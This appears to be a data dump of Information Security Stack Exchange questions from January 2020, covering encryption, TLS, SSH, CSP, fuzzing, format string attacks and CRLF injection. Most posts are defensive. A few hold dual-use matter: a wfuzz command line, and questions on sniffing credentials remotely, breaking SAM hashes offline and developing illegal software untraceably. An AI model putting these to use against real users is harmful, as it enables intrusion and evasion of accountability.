  1. How problematic is it that this approach does not implement HMAC?
  2. +
+ +

How important is HMAC, given that these files are to be uploaded to a server, encrypted at rest, and then downloaded from the same server? The files are encrypted while in transit via TLS over HTTPS, so I'm not concerned about an adversary compromising their integrity while in transit. The server on which the files reside at rest is ""trusted"" in that I control it, but, of course, that does not mean it couldn't be compromised in some capacity. What are the risks in foregoing HMAC, given my use-case, and is it feasible to implement using a chunked approach?

+ +

Thanks in advance for any feedback!

+",44399,,44399,,1/3/2020 14:32,1/3/2020 14:32,How does one implement chunked CBC encryption safely; is this implementation flawed?,,0,0,,,,CC BY-SA 4.0 +223633,1,223657,,1/3/2020 16:06,,8,1340,"

From my experience, 99%[citation needed] of the time, when you try to log on to a website, and you mistype your password, you get some indication that the login could not proceed due to incorrect information and the password field is cleared out. Usually the username field remains filled in, so you simply have to retype your password.

+ +

In a small fraction of instances, I've found that some websites do not clear out the password field after an incorrect login attempt. Is this a security issue? I can't think of how or why it may be, but I find it odd behavior since the overwhelming practice seems to be to clear the password field. Can this practice be exploited in some way by someone?

+ +

As an addendum, is there some sort of standard that says the password field should be cleared out after an unsuccessful login attempt or is this practice something that most websites have converged on without formalizing anywhere?

+",134100,,,,,1/6/2020 16:01,Clearing password field after an invalid login attempt,,3,5,,,,CC BY-SA 4.0 +223642,1,,,1/3/2020 18:31,,1,281,"

What's the likelihood of a laptop being compromised when it comes directly from a trusted computer store or a large, known computer technology company? Would there be any liability if malware or rookit was discovered?

+ +

What checks / scans would you perform if you wanted to be as sure as possible that it hasn't been compromised?

+",224380,,,,,2/2/2020 20:03,Security of a laptop order,,1,1,,,,CC BY-SA 4.0 +223643,1,223647,,1/3/2020 18:45,,1,170,"

With SSH, most of my servers use ed25519 (the twisted Edwards variant EC) for authentication.

+ +

I was wondering, after authentication with ed25519, does SSH protocol 2 simple use ephemeral/ephemeral ECDH over curve25519 for the session key?

+ +

I can't see what else it's doing unless it converts the ed25519 x,y co-ordinates to curve25519 Montgomery variants to establish the session key.

+ +

Example output verbose is:

+ +
debug1: kex: algorithm: curve25519-sha256
+debug1: kex: host key algorithm: ssh-ed25519
+debug1: kex: server->client cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
+debug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
+debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
+debug1: Server host key: ssh-ed25519 SHA256:KvJtkvHyH/+oU3VaDDMQbUHIyI9P+LDLv0FqLdrfmEk
+debug1: Host 'ubuntu-prime.local' is known and matches the ED25519 host key.
+debug1: Found key in /Users/john/.ssh/known_hosts:40
+
+ +

My question is, what curve25519 keypairs are being used here?

+",140436,,,,,1/3/2020 19:32,SSH and the ECDH component,,1,0,,,,CC BY-SA 4.0 +223645,1,223719,,1/3/2020 19:24,,3,510,"

The description from Mozilla warns that require-sri-for is obsolete and may be removed at any time.

+ +

The feature seems useful, especially for large websites where it's likely that a developer may forget to include an integrity attribute.

+ +

Is there a specific reason this has been deprecated? Is there an alternative feature to use instead?

+",31625,,,,,1/5/2020 14:30,Why is CSP require-sri-for marked as obsolete?,,1,2,1,,,CC BY-SA 4.0 +223658,1,,,1/3/2020 23:02,,0,2434,"

My host machine is running Windows 10. I've installed VirtualBox and use it to run an Ubuntu VM. Inside the VM I use Firefox to do all of my web browsing that doesn't involve entering sensitive data like important passwords, financial data or government id info.

+ +

I use another separate Ubuntu VM for just the following: +- checking my email and social media +- shopping from amazon and newegg

+ +

On my host (the windows machine) I use the paid version of Bit Defender Total Security to perform regular scans and it is configured to its default settings.

+ +

Finally for banking and logging into government websites, I use a separate (physical) Chromebook, which is exclusively for those purposes and strictly nothing else.

+ +

Is this all a good security practice? Or is it all just a lot of extra work for nothing?

+",224392,,,,,4/14/2021 16:37,Is using virtualbox for web browsing worth it for added security?,,3,2,,,,CC BY-SA 4.0 +223662,1,,,1/4/2020 0:17,,0,19,"

So, imagine that a vulnerable app provides a login interface. This login sends the user's credentials to the App's server to authenticate the user. However this is done via HTTP, therefore not secure.

+ +

If I were inside the user's LAN network, I could easily perform a MITM and sniff the traffic and therefore the unencrypted credentials.

+ +

The questions is, how can I retrieve the credentials of a specific user by knowing this vulnerability WHILST being outside the network? What kind of practical attack vectors would there be?

+ +
    +
  • One could be a malicious but disguised app on the user's phone which monitors this traffic? (but obviously this would require a way of convincing the user of installing this app and also would count as being part of the LAN)
  • +
+",224393,,224393,,1/4/2020 0:24,1/4/2020 0:24,Sniffing Traffic Android App,,0,3,,1/4/2020 1:21,,CC BY-SA 4.0 +223663,1,,,1/4/2020 1:18,,0,175,"

I set up an external drive for data backup (an SD card inside my laptop card slot). In addition, I connect with a cloud drive for offsite backup (an app that I run only when syncing files).

+ +

I always sign in and use my laptop as a 'standard' user. My external drive is set for UAC 'read' privilege only.

+ +

I then set my data sync app to run as admin only - meaning I need to type in the admin password before data can be synced to my external drive and to the cloud.

+ +

Of course I will remain vigilant about keeping OS and apps updated and avoid clicking email links or downloading unsolicited payloads,etc. -- but in case I miss something and a ransomware comes through, will my Win 10 system stop that ransomware from encrypting my external drive?

+",224395,,,,,6/2/2020 6:30,Will this Setup Protect My Data Files from Malware (e.g. Ransomware)?,,2,1,,,,CC BY-SA 4.0 +223666,1,223682,,1/4/2020 4:59,,1,1617,"

I know that you can pass cookies in Wfuzz by using multiple -b parameters like so: wfuzz -w /path/to/wordlist -b cookie1=foo -b cookie2=bar http://example.com/FUZZ

+ +

but I am wondering if you can pass a list of cookies, instead of doing them one by one, which takes forever and is ineffecient. I have looked everywhere for an answer it seems but I can't find one.

+",223896,,,,,6/5/2020 11:36,How do I pass a list of cookies to Wfuzz?,,2,0,,,,CC BY-SA 4.0 +223667,1,,,1/4/2020 5:48,,11,726,"

gpg has some preset default settings, which I assume were selected as a compromise between speed and security. I understand that these are good enough for most people.

+ +

But, in a situation where speed / performance was not an issue, what defaults could be changed, to make gpg use stronger parameters, and use even stronger encryption ?

+ +

For example, I have read discussions about the s2k-count default value being not sufficient. I really don't care if my gpg operation takes 50 milliseconds or 200 milliseconds. I would rather err on the side of safety, even if it is overkill.

+ +

Specifically, I would like to use the strongest possible values for:

+ +
    +
  1. password hashing iterations
  2. +
  3. size of asymetric key
  4. +
  5. algorithm for symetric key
  6. +
+ +

What else could be changed from default values, to make gpg more secure ?

+ +

I am using gpg (GnuPG) 2.2.12 on Debian Buster.

+",124292,,98538,,1/7/2020 8:20,1/7/2020 8:20,"What gpg defaults can be improved, when performance is not an issue?",,1,3,2,,,CC BY-SA 4.0 +223671,1,,,1/4/2020 12:14,,3,783,"

I am aware that Format String Attacks work by having a vulnerable function which allows the user to read values from the stack using %x and write by using %n.

+ +

Since one of the goals of a Format String Attack can be to overwrite the address of a function in the Global Offset Table, I was wondering does StackGuard prevent this?

+ +

I know that StackGuard protects save-return addresses of functions to be overwritten, however, will it help against a Format String Attack if that attack aims to change the GOT values?

+",224408,,,,,10/17/2020 16:01,Does StackGuard prevent Format String Attacks,,1,0,,,,CC BY-SA 4.0 +223684,1,223781,,1/4/2020 19:12,,3,387,"

I'm debugging some edits I made to hostapd which requires me to capture some beacon frames, but I can only capture them with airodump-ng and not with wireshark.

+ +

I have a Panda PAU09 adapter running on Kali.

+ +

Method #1:

+ +

I fire up airmon-ng and put the Panda into monitor mode. Next I run airodump-ng to find the BSSID and channel of my system running hostapd. Then I run airodump-ng again to capture to a file. I open the CAP file in Wireshark, and there are my beacons. COOL! Exactly what I needed!

+ +

Method #2:

+ +

I put the interface into monitor mode and start Wireshark on that monitor interface. I set the filter to just look for beacons and see tons of them... but none from my AP. I remove the filter and see no traffic at all from the MAC. I even log into the hostAP system to verify the MAC and it is correct. No traffic from that device at all in wireshark, but plenty with airodump.

+ +

I'd really like to just use Wireshark.

+ +

Thoughts on how to debug?

+ +

Thanks.

+",121834,,,,,1/7/2020 1:31,"Why does airodump-ng shows 2.4GHz AP beacons, but wireshark does not?",,1,2,,,,CC BY-SA 4.0 +223685,1,,,1/4/2020 19:36,,0,397,"

I bought a used laptop and I'm concerned about the integrity of the firmware on the hardware and bios. I realize these types of malware are very rare.

+ +

1) My question is that if I assume that the BIOS or SSD or NIC firmware is indeed compromised from the previous owner, what are some of security features that something like Qubes OS will provide me despite this?

+ +

2) I have read that installing AIDE/Tripwire on dom0 at the beginning of a fresh Qubes OS install can be a powerful tool to see whether the BIOS malware infection is going to damage the dom0 and other downstream VMs in any way going forward. Do you think this is useful?

+ +

3) The manufacturer website has downloads for BIOS firmware, SSD firmware, wireless LAN/WAN, etc. My BIOS and other firmwares are 1 year out of date. If I update these firmware over windows, and then wipe windows from SSD and start a fresh Qubes OS install, will the firmware stay updated? And will it also remove potential malware that was previously infected?

+ +

4) What are some good practices for preventing these types of firmware attacks? My system uses TPM 2.0. Is there a guide to get TPM2.0 working with dom0 to check and analyze logs? Is it a good practice to turn off/not update intel ME, disable intel TXT, AMT, and secureboot? Because that is what I did.

+",224428,,,,,1/4/2020 23:27,Used laptop with potential BIOS/SSD firmware malware,,1,1,,,,CC BY-SA 4.0 +223686,1,223687,,1/4/2020 19:38,,1,2078,"

Currently I have a Node JS project that uses the Spotify API. The project displays the users top played artists and tracks. I am following the Authorization Code Flow to obtain the access token. This access token will be used to query certain endpoints to obtain a JSON response of the data that will be used for my project. This token lasts an hour. I am currently storing this access token in a cookie and using this cookie to make new requests.

+ +

My question is is this acceptable from a security standpoints? This token does not have the ability to change any of the users profile settings or read sensitive data. However, if another person were able to obtain this token they could use this to see another user's data. Or would it be more secure to store this access token in a database an query the database for access tokens whenever need?

+",224083,,215709,,1/5/2020 12:19,1/5/2020 12:19,Storing third party API tokens in a database,,1,0,,,,CC BY-SA 4.0 +223688,1,223691,,1/4/2020 21:16,,18,4804,"

This question was prompted by a recent visit to a certain site that provides (apparently for GDPR reasons) a table with all of your data, including part of your hashed password. I understand this poses no problem in this case (as you would have to be logged in to see this table), but what if this data was made public?

+ +

To rephrase more clearly: does revealing part of your password hash (including the hash length) make password cracking (via bruteforce or any other method) any simpler or more efficient than before?

+",224431,,224431,,1/6/2020 18:49,1/10/2020 17:52,Does revealing part of your hash give an attacker advantage when attacking your password?,,3,9,3,1/6/2020 18:59,,CC BY-SA 4.0 +223689,1,223692,,1/4/2020 21:37,,1,230,"

They say that the last TOR node presents all the information in clear.

+ +

If I want to send some sensitive information by TOR, could you encrypt it, and in this way be encrypted by both the TOR nodes, and by my encryption?

+ +

Is this possible?

+",224059,,86735,,1/4/2020 21:44,1/4/2020 22:07,Encrypt data within the TOR network,,1,7,1,,,CC BY-SA 4.0 +223693,1,223704,,1/4/2020 23:22,,5,333,"

My goal is to develop a piece of software which is illegal in my country. Obviously I don't want anyone to be able to trace the code back to me or prove that I developed it after deployment. +What precautions would be needed? Which pitfalls need to be avoided? Is there a tutorial?

+ +

I would suspect that full drive encryption on your development machine and internet connectivity over Tor are required.

+ +

What setup would be needed when developing in countries with political repression or similar conditions?

+",224435,,10863,,1/4/2020 23:59,1/5/2020 7:49,Untraceable software development,,1,5,1,,,CC BY-SA 4.0 +223699,1,223702,,1/5/2020 2:00,,1,267,"

Before you immediately comment ""you can't trust the client!"", please read the whole question.

+ +

I've been reading about how to prevent XSS attacks lately, and everything I've found says that the server should sanitize the data that will be put into the webpage. This would basically look like addToDatabase(filter(userResponse)). Then the client can safely add display anything that it gets from the server.

+ +

I was wondering if it would be safe to store the potentially unsafe data in the server, and have the client filter it when it was received, like addHTML(filter(serverResponse)). This would stop the data from being executed client-side, so no XSS would take place. I understand that anyone could simply remove that filter, however all that would do is make themselves vulnerable. Since other clients would filter anything sent to them, a malicious client could could only disable their own filter and mess up themselves. +(I'm not talking about SQL injection prevention, that would be obviously have to be server-side)

+ +

To summarize: The server doesn't sanitize, but the clients sanitize whatever they receive.

+ +

Would this be safe?

+",179871,,,,,1/5/2020 5:23,Preventing XSS by filtering data from the server to the client,,2,0,1,,,CC BY-SA 4.0 +223700,1,,,1/5/2020 2:24,,0,159,"

I am working to set up OpenVPN access to my home network. To do this, I had to contact my ISP, because they had the necessary port blocked at the Gateway/Router that I do not have access to.

+ +

In my house, I have a Google WiFi system.

+ +

They put the provided Gateway in Bridge mode, instead of Router mode. This solved my problem, but when I ran an nmap against my public IP afterwards, a great number of ports (including vulnerable ones) were now listed as ""open"".

+ +

My question is, since I have the router in the house, and I have it set up to block all ports I have not configured to forward, is there any real risk here, having the ports showing as open at the Gateway?

+",194748,,,,,1/5/2020 2:24,Open Ports at ISPs Gateway,,0,2,,,,CC BY-SA 4.0 +223706,1,,,1/5/2020 10:33,,2,317,"

Given the plethora of random password generators (RPG) available, I'd like to do some black box testing on some.

+ +

Let's take https://passwordsgenerator.net/ for example. Assuming the whole generator is a black box with 0 information about how the passwords are generated (can't even view the .js stuff), and all we have is a ""Generate password"" button that somehow outputs a seemingly random password each time it's clicked.

+ +

We do NOT know:

+ +
    +
  • Who made or hosts the RPG
  • +
  • What algorithms are used to generate the password
  • +
  • How they get the randomness (Atomic decay? Lava lamps? Monkeys on type writers? People trying to exit Vim?)
  • +
  • Source code.
  • +
+ +

What we know:

+ +
    +
  • If you click ""Generate password"", you get a seemingly random password
  • +
+ +

We can get thousands or millions of passwords as testing data. Given just those passwords, can we analyze them to figure out (even just estimate) how cryptographically secured the RPG is?

+ +

(I'm not looking for processes enough to generate whole reports and research papers. I'm just thinking of a way the common people can do a ""quick"" and rough test on the RPGs, maybe to choose between the common RPGs)

+",206331,,,,,1/6/2020 13:38,How can one test if a password generator is cryptographically secured?,,3,5,,,,CC BY-SA 4.0 +223707,1,,,1/5/2020 10:40,,1,106,"

When looking at entitlements on pycharm CE for macOS, it shows many serious security exceptions. Here are its entitlements:

+ +
<dict>
+        <key>com.apple.security.cs.allow-jit</key>
+        <true/>
+        <key>com.apple.security.cs.allow-unsigned-executable-memory</key>
+        <true/>
+        <key>com.apple.security.cs.allow-dyld-environment-variables</key>
+        <true/>
+        <key>com.apple.security.cs.disable-library-validation</key>
+        <true/>
+        <key>com.apple.security.cs.disable-executable-page-protection</key>
+        <true/>
+</dict>
+
+ +

Why does pycharm uses such lax security? Is it necessary?

+ +

I tried to look into pycharm's source code, and I saw this commit:

+ +
+

Add macOS notarization script

+ +

GitOrigin-RevId: e8779699a5c41df82848b335a3aed82b7550c7eb

+ +

VladRassokhin authored and intellij-monorepo-bot committed on Jun 5, + 2019 commit 631c91b

+
+ +

c1a579488452da099b957305502cda2f4

+ +

But I couldn't find a clear reason why pycharm would need these security gaps. Can anyone with knowledge of pycharm's code can shed light on this?

+",143641,,,,,1/5/2020 10:40,Why does pycharm uses lax security on macOS?,,0,0,,,,CC BY-SA 4.0 +223713,1,,,1/5/2020 12:41,,5,301,"

Given a setup where we have nginx sat in a DMZ serving static content, forwarding (REST/WS) requests through a firewall to tomcat running on a server where other applications are also running:

+ +
YOU <> [FW:443] <> (NGINX) <> [FW:8443] <> (TOMCAT)
+                                           ( APP1 )
+                                           ( APP2 )
+                                           (  DB  )
+
+ +

Can I focus on just the nginx & tomcat applications in terms of patching CVEs/vulnerable dependencies, or must I ensure that all other applications are as 'CVE-free' as possible.

+ +

I believe this is different to this question about whether applications behind a public firewall need to be patched.

+",224450,,,,,1/1/2022 18:07,"Fix vulnerabilities in ALL applications, or only client-facing ones?",,3,4,,,,CC BY-SA 4.0 +223718,1,223746,,1/5/2020 13:55,,4,887,"

When a mobile app is sending HTTPS requests, it verifies the server certificate against some kind of certificate store. My question is, would that certificate store be provided by the phone's OS, or would it be packed with the app?

+ +

I know I can do certificate pinning, but first I want to know what's the default.

+ +

If there's any difference between Android and iOS, I'd want to know that.

+",16116,,,,,1/6/2020 8:59,Do mobile apps have their own certificate store?,,1,0,1,,,CC BY-SA 4.0 +223720,1,,,1/5/2020 14:57,,0,119,"

If we user both: desktop VPN client + chrome VPN extension +or +if we use just browser's vpn extension,

+ +

does ISP see which website/link we visit?

+",224457,,,,,1/5/2020 15:04,Can ISPs see which website we visit when we use desktop VPN client and browser VPN extension?,,1,0,,1/14/2020 23:14,,CC BY-SA 4.0 +223721,1,,,1/5/2020 15:04,,0,109,"

I assume the state is not 4Gb but that there's a 32bit counter and it's mixing like in chacha. What's the point of creating those 4Gb if there's no entropy to do so. What I mean is that if the first 1024 bits are the same, so would the rest of the 4Gb, so why even offer the option.

+",208898,,,,,1/5/2020 15:04,How can Blake2X produce 4gb digests?,,0,2,,,,CC BY-SA 4.0 +223726,1,223728,,1/5/2020 19:08,,0,148,"

Exposing primary keys is bad practice. How should I expose UUID or BIGSERIAL Primary Keys to clients — hashing, encoding, encrypting? For integers there are libraries like hashids, what about UUID?

+",222160,,,,,1/5/2020 19:56,Exposing UUID or BIGSERIAL Primary Keys,,1,0,,,,CC BY-SA 4.0 +223729,1,,,1/5/2020 20:18,,2,850,"

How do you prevent someone from doing an TCP reset attack between client and host without having acess to host?

+ +

I am trying to solve a CTF for fun and learning purposes. +In one of the challenges I establish a connection with a server that starts sending me TCP packages, but I am interupted by a third party that sends what appears to be a forged tcp reset. I receive a RST, ACK and the packages stops coming.

+ +

I have tried both DROPing and REJECTing the RST package without success, using the following command:

+ +
iptables -A INPUT -p tcp --tcp-flags RST RST -j DROP
+
+ +

Is there any way that I could nullify the attacker trying to prevent communication between me and the host? +

+",224467,,90657,,1/7/2020 1:35,1/7/2020 7:37,TCP reset attack / forged TCP reset prevention,,0,6,1,,,CC BY-SA 4.0 +223730,1,223745,,1/5/2020 20:59,,1,454,"

Keepassx lets you decide how many transformations rounds need to be run in order to unlock your Keepass database. In my version of Keepassx (2.0.3) the max value seems to be 999,999,999. With that setting it takes my laptop about 22 seconds to unlock the database. I imagine that a beefy workstation would take less time than that. With that in mind, how well can this setting deter someone else from accessing your database, assuming that they managed to get access to it? Let’s just say an individual (not an organization) with a computer made to do this kind of work. How much work can you assume that they will have to do per try with the kind of computation power that they will have access to in twenty years?

+",224469,,,,,1/6/2020 8:02,How well will the max transformation rounds in Keepassx deter an attacker for the next twenty years?,,2,4,1,,,CC BY-SA 4.0 +223731,1,,,1/5/2020 23:57,,1,476,"

I selfhost my mail server and have earlier downloaded Spamassassin corpus from http://artinvoice.hu/spam to have a head start on the bayes learning.

+ +

The artinvoice.hu site is down and has been for weeks.
+Are there any known good alternatives?

+",224474,,,,,1/25/2020 20:05,Spamassassin public corpus,,2,0,1,1/25/2020 20:16,,CC BY-SA 4.0 +223732,1,223741,,1/5/2020 23:59,,2,464,"

I've read that pre-shared keys (PSKs) are symmetric keys shared in advance among communicating parties but have found no explanation as to how the TLS client and server agree upon the value of the PSK. How is this done?

+",224476,,138516,,1/6/2020 5:27,1/6/2020 8:34,How are PSKs agreed upon by the TLS server and client?,,2,5,3,,,CC BY-SA 4.0 +223737,1,223868,,1/6/2020 4:23,,67,44605,"

Just before Christmas I received the following message in one of my GMail accounts:

+ +
+

Sign-in attempt was blocked
+ ********@gmail.com [redacted by me]

+ +

Someone just used your password to try to sign into your account. Google blocked them, but you should check what happened.

+
+ +

I signed into that account and looked at the activity (not by clicking the link in the message, of course) and indeed there was a sign in attempt blocked from the Philippines.

+ +

I gather this means that an attacker entered the correct user name and password for my account, but was likely blocked because they couldn't pass the MFA challenge. Or maybe Google's fraud detection is actually decent and it knows I've never been to the Philippines? Either way, I immediately changed the password and (as far as I know) the attacker didn't gain control of the account.

+ +

However, in the 2 weeks since then, I have received several email verification requests from various online services that I never signed up for -- Spotify, OKCupid, a Nissan dealership in Pennsylvania (that one's interesting), and a few others I've never heard of before. Someone out there is actively using my GMail address to enroll for these services.

+ +

The account in question is not my main account, and while the password on it was admittedly weak, it was also unique (I never used it on anything else). I changed it to a password that's much stronger now.

+ +

Should I be concerned about this?

+ +

Also, if the attacker didn't gain control of the account, why use it to enroll in all these services?

+",171798,,,,,10/30/2021 23:28,My email address is being used to enroll for online services. Should I be concerned?,,5,13,7,,,CC BY-SA 4.0 +223740,1,,,1/6/2020 7:18,,1,3124,"

I posted a question similar to this one on Stack Overflow, but that has not produced any answers so far, so I'm hoping someone here will be able to help me out.

+ +

Somewhat simplified, I'm trying to do a POST request via https using Postman (later I'm hoping to reproduce it in PL/SQL under Oracle using UTL_HTTP), but I'm having some certificate-related issues. I have a specific url I'll be trying to reach later, but for testing purposes, I've been using a webhook url just to verify that I could make calls out at all.

+ +

I am able to perform a post request to a https-address if I disable SSL Certificate Verification under the Postman settings - so it's apparently possible to reach an outside url, so long as I don't care about the validity of the certificates used.

+ +

Proxy issues
+I my problems are due to the fact that I'm behind a proxy at the organization I'm currently working for. If I look at the certificate path for the cert for webhook.site for instance, it looks like the following, where the grayed out parts of cert names are names related to the organization.

+ +

+ +

The result of this is that when I try to perform https POST requests to webhook without disabling cert verification, it fails with the following error shown in my Postman console:

+ +
+

Error: unable to verify the first certificate.

+
+ +

Attempted solutions
+A couple of things I've experimented with to try to solve this:

+ +
    +
  • Importing and adding any or all of the certs from the certification path shown above into my cert store.
  • +
  • Importing the certs into Postman (under Settings > Certificates) - although I'm far from certain that I've done this correctly, or if this is even the right way to go about it.
  • +
+ +

My hunch is that I just need to get the correct certificate installed in the correct place in order for this to work. The problem is I can't figure out which certificate that should be in this case (or where it should be installed for that matter, though I would assume that adding it under trusted root certificates in the system cert store should suffice?).

+ +

Are these assumptions correct? Any tips on how I can figure out exactly which certificate I'm actually missing?

+",42360,,,,,9/27/2021 11:03,How to identify which certificate I'm missing to produce HTTPS calls?,,1,0,1,,,CC BY-SA 4.0 +223749,1,223750,,1/6/2020 10:02,,3,173,"

I'm looking into mutual TLS authentication for a B2B API. Is it possible to use mutual TLS authentication using X.509 certificates while relying on Public CAs?

+ +

I see that some Public CAs (from CA/Browser Forum) offer signed ""client authentication"" certificates. What fields can I rely on in this case? Would I be able to just map the Subject Name to a user in my application and trust the CA/Browser bundle?

+ +

Can ""Public CA 1"" guarantee that ""Public CA 2"" will not sell the exact same certificate to a different company?

+",31030,,,,,1/7/2020 13:32,Client Certificates from Public Certificate Authorities,,2,0,1,,,CC BY-SA 4.0 +223752,1,,,1/6/2020 11:28,,1,151,"

Just reviewing some logs and I am seeing local scans to several local IP addresses on port 137 within my network. The source IP however is the broadcast IP of the VLAN (.255).

+ +

I have checked the logs and I can see the broadcast IP trying to initiate udp 137 connections on several other IP addresses of the same subnet.

+ +

Many of the errors being shown are ""The Windows Filtering Platform has blocked a connection"".

+ +

I cant really make sense of the Source IP address being the broadcast IP. Has anyone come across this before please? and from your experiences, where should I be looking that I could have missed? Thanks.

+",197502,,,,,1/26/2022 0:03,Local Scans initiated from a VLAN Broadcast IP address,,1,2,1,,,CC BY-SA 4.0 +223753,1,,,1/6/2020 11:57,,1,198,"

Veracode is reporting a security issue on a piece of code which seems pretty innocuous to me. The code is built with python/Django and the line in question is:

+ +
+

return render(request, 'core/create-user.html', context)

+
+ +

The render shortcut for django is pretty standard and it expects a request object, name of template and context to be passed to template. I am not sure why Veracode is complaining for this.

+ +

It seems it is picking up the word ""create-user"" from the template name and assuming it be a OS/library method being called for creating a user based on some user input and which is why it is complaining but this sounds pretty dumb to me on behalf of Veracode.

+ +

Is it really a security issue, if so why? Or is it a false positive?

+",143010,,,,,1/7/2020 10:14,"VeraCode static code scan of django view reports ""External control of Filename or Path"" on render method",,1,4,,,,CC BY-SA 4.0 +223754,1,,,1/6/2020 13:00,,1,397,"

I have the following code in my frontend javascript which basically reads the csrf cookie value and sets that in the ajax calls done via jquery.

+ +
    var csrftoken = self.getCookie('csrftoken');
+    xhr.setRequestHeader(""X-CSRFToken"", csrftoken);
+
+ +

This seems to be a very standard technique and yet Veracode reports it as a vulnerability.

+ +

Looking at the details of this kind of vulnerability, at https://cwe.mitre.org/data/definitions/113.html, I don't see how could it be an issue given the http header is being set from client end and not server end. If the csrf token value is injected wrongly, the request would not suceed due to csrf mismatch anyways.

+ +

Why does Veracode consider this to be a vulnerability at all or is it a vulnerability that I am unable to understand?

+",143010,,,,,2/25/2022 18:05,"VeraCode static code scan reports ""Improper Neutralization of CRLF Sequences in HTTP Headers"" for frontend code",,2,0,,,,CC BY-SA 4.0 +223758,1,,,1/6/2020 14:24,,1,1746,"

Is it possible to break a Windows encrypted SAM file where passwords are stored if you have the physical drive offline?

+ +

Thanks

+",224512,,,,,1/9/2020 3:39,Breaking SAM windows password file offline,,1,0,,,,CC BY-SA 4.0 +223760,1,,,1/6/2020 14:38,,0,216,"

I found CRLF injection on a site but it doesn't has any login, session or anything or that sort. I wonder if there's any way to prove impact of CRLF injection here.

+ +

Something that I think can be done is, an attacker can craft the payload in such a way that it would respond with Location header and user would be redirected to a malicious site. This is called Response Splitting. But I'm not sure if the company would consider this as a vulnerability because user's can only be redirected.

+ +

I asked myself if that's the only thing an attacker can do? After sometime I realized XSS can also be perform with response splitting but what would attacker get with XSS as there is no session cookie or anything?

+ +

I can't figure out how to show am impact of this, are you aware of any interesting header or anything, any help?

+ +

EDIT: I found a broken link to an external site on this same forum and checked for content on wayback.

+ +

It says.

+ +
+

Cross-User Defacement: An attacker can make a single request to a vulnerable server that will cause the server to create two responses, the second of which may be misinterpreted as a response to a different request, possibly one made by another user sharing the same TCP connection with the server. This can be accomplished by convincing the user to submit the malicious request themselves, or remotely in situations where the attacker and the user share a common TCP connection to the server, such as a shared proxy server. In the best case, an attacker can leverage this ability to convince users that the application has been hacked, causing users to lose confidence in the security of the application. In the worst case, an attacker may provide specially crafted content designed to mimic the behavior of the application but redirect private information, such as account numbers and passwords, back to the attacker.

+
+ +

But I don't understand it properly, can anyone please explain it in simple words?

+",224511,,224511,,1/6/2020 14:56,2/5/2020 16:03,Is there an impact of CRLF injection on static sites?,,2,0,,,,CC BY-SA 4.0 +223765,1,,,1/6/2020 15:52,,1,340,"

The following questions regard linux processes with a stack that grows downwards from the end of the process memory.

+ +
    +
  1. If I have a buffer overflow on the heap with unlimited size, are there any protection against me overwriting the entire process memory until reaching the stack and overwriting it?

  2. +
  3. Same question for buffer overflows in mmaped memory regions, which in comparison to the heap can reside closer im memory to the stack

  4. +
+ +

Thanks!

+",224518,,,,,9/28/2020 2:06,Can a heap/mmap buffer overflow overwrite the stack,,1,0,,,,CC BY-SA 4.0 +223768,1,,,1/6/2020 16:47,,3,286,"

I am trying to write an API that allows the user to reset their password via their email.

+ +

I have been following https://www.smashingmagazine.com/2017/11/safe-password-resets-with-json-web-tokens/, but I am a bit confused. They are sending the email and user_id in the payload as JSON, but they never actually need this information. The only time they use the payload data is when they could easily retrieve the same data from another source.

+ +

So what is the point in sending it?

+",224522,,19891,,1/6/2020 18:16,9/28/2021 11:02,What is the point of the payload in reset password API with JWT,,1,0,,,,CC BY-SA 4.0 +223774,1,223775,,1/6/2020 22:03,,3,328,"

I'm working on an Interactive Fiction story in Undum, which is a fully client-side JS/HTML5 framework. I've been reading about Content Security Policy lately (after looking up what a crypto nonce is) and began to wonder if any such thing would be important for code that's entirely client-side. I'd apply some basic CSP if I could, mainly the ban on inline code exec, but it looks like that can only be specified in an HTTP header which I don't control in this case (I think -- there's no transfer happening in my game, but github pages hosts the HTML and JS so HTTP is in use and is presumably controlled by github)

+ +

This question addresses a similar concern, but is a simpler context since it will be running locally on that OP's machine. My context will be as follows:

+ +
    +
  • Where is the HTML and JS hosted: my github pages account. It's not actually up there yet, but a different one implemented in Inform 6 and run on a JS Inform interpreter (Quixe) is here and I don't see an obvious CSP in the HTTP headers
  • +
  • Where do dependencies come from: local JS files, jquery and undum library only
  • +
  • What operations are involved: clicking generated links within the page, generating/rendering HTML from local JS (no arbitrary text user input), writing to/reading from HTML5 window.localStorage object if available to support game save/load
  • +
  • Protocol: HTTPS
  • +
+ +

What security concerns might be relevant to a kinda sorta web app like this? There's no sensitive data involved; I'm mostly concerned with any sort of malicious script injection that might be possible.

+",142166,,142166,,1/6/2020 22:11,1/6/2020 22:51,What security concerns are there for a fully client-side JS/HTML5 app?,,1,1,,,,CC BY-SA 4.0 +223782,1,,,1/7/2020 2:05,,1,755,"

I'm building an SPA app and I have to use an access token to make requests to an API. The most common way to store the JSON Web Tokens is to use localStorage, but I have always thought that was a bad idea because of XSS attacks or a user could be socially engineered to go to the console, get the token and give it away.

+ +

So I use this JavaScript library called 'secure-ls', which uses localStorage but encrypts the data. The encryption key is randomly generated for each instance of the application, so I don't store it as plain text in the code.

+ +

This is what it looks like:

+ +
private static _instance: SecureStorage = new SecureStorage({
+    encryptionSecret: crypto.randomBytes(60).toString(),
+});
+
+ +

This is what the encrypted data in the console looks like:

+ +

+ +

The plain-text data in localStorage is only available to the code. I believe this is sufficiently secure and I can't see how a hacker could get the plain-text data.

+ +

So it leaves me to wonder why more people don't use this method? Or is there some loophole I'm missing in how a hacker could get the data?

+",224539,,,,,1/7/2020 2:55,Is encrypting localStorage data more secure?,,1,1,,,,CC BY-SA 4.0 +223786,1,231004,,1/7/2020 4:11,,0,157,"

Can this method of encryption prevent bruteforce attacks?

+ +

If I had a hypothetical table (or function) where every grammatically valid sentence (limited to some number of words) was given an associated number, e.g:

+ +
""Good morning, how are you."" = 3283
+""Today is a nice day."" = 2183
+
+ +

Then added a number (as a key), e.g:

+ +
3283 + 1234 = 4516
+
+ +

Wouldn't this final output of 4516 be effectively protected against bruteforce attacks?

+ +

Ignoring the difficulty of producing a hashtable/function capable of reducing every valid input into a single number, and the issue of sending the key 1234 securely.

+ +

Is there any way of finding the original input only from the output?

+ +

Is limiting the domain of the encryption to only valid inputs, an effective method of preventing bruteforce attacks?

+ +

If so is there any practical example of this? Why or why not?

+",211767,,211767,,6/13/2020 11:47,6/13/2020 11:47,Can bruteforce attacks be prevented with tables of valid inputs?,,1,15,,,,CC BY-SA 4.0 +223795,1,,,1/7/2020 8:41,,1,446,"

